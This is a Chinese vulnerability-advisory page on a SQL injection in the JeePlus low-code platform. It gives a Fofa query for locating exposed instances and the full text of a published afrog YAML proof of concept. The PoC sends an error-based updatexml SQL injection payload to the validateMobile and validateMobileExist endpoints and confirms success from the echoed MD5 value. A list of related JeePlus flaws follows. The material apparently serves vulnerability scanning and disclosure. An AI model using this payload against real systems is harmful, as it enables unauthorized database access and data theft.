jeeplus-sys-user-validate-sqli: JeePlus低代码开发平台SQL注入

日期: 2025-09-01 | 影响软件: JeePlus低代码开发平台 | POC: 已公开

漏洞描述

JeePlus低代码开发平台SQL注入 Fofa: app="JeePlus"

PoC代码[已公开]

id: jeeplus-sys-user-validate-sqli

info:
  name: JeePlus低代码开发平台SQL注入
  author: zan8in
  severity: high
  verified: true
  description: |-
    JeePlus低代码开发平台SQL注入
    Fofa: app="JeePlus"
  reference:
    - https://github.com/zan8in/afrog-pocs/tree/main/pocs
  tags: jeeplus,sqli
  created: 2024/02/28

set:
  randInt: randomInt(1000000000, 9999999999)
rules:
  r0:
    request:
      method: GET
      path: /a/sys/user/validateMobile?&mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+md5%28{{randInt}}%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271
    expression: response.body.bcontains(b'XPATH syntax error:') && response.body.bcontains(bytes(substr(md5(string(randInt)),0,31)))
  r1:
    request:
      method: GET
      path: /a/sys/user/validateMobileExist?&mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+md5%28{{randInt}}%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271
    expression: response.body.bcontains(b'XPATH syntax error:') && response.body.bcontains(bytes(substr(md5(string(randInt)),0,31)))
expression: r0() || r1()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/jeeplus-sys-user-validate-sqli.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

JeePlus低代码开发平台 getFile 任意文件读取漏洞 POC

JeePlus低代码开发平台 任意文件上传漏洞 无POC

JeePlus低代码开发平台多处SQL注入漏洞 无POC

JeePlus低代码开发平台 resetpassword接口 SQL注入漏洞 无POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

JeePlus低代码开发平台任意文件上传漏洞无POC

JeePlus低代码开发平台多处SQL注入漏洞无POC

JeePlus低代码开发平台 resetpassword接口 SQL注入漏洞无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC